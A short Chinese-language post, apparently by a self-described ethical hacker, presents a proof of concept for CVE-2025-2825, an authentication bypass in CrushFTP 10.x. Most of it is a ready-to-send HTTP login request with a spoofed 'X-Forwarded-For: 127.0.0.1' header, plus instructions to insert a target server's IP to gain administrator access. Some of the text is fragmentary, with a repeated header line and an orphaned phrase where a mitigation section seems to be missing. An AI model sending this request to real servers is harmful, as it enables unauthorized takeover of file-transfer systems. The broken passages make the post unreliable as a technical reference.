
CVE-2025-2825 身份验证绕过 PoC – 利用 CrushFTP 10.x
CVE-2025-2825 是一个影响 CrushFTP 的严重身份验证绕过漏洞,CrushFTP 是一款广泛使用的安全文件传输服务器。该漏洞允许远程攻击者通过伪造标头绕过登录身份验证并获得管理员访问权限——诱骗服务器认为请求来自 localhost。
该漏洞源于对 X-Forwarded-For 标头的验证不当。当此标头设置为 127.0.0.1 时,服务器会将请求视为本地请求——从而绕过身份验证。
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 将
target-ip替换为目标 CrushFTP 服务器的实际 IP 地址。
如果成功,服务器将绕过身份验证并授予访问权限——即使使用错误的凭据也是如此。
X-Forwarded-For: 127.0.0.1
X-Forwarded-For 等标头。Shivshant Patil
注册道德黑客 (CEH v13)
B.Tech 计算机工程毕业生
🔗 LinkedIn 个人主页
🔗 GitHub 个人主页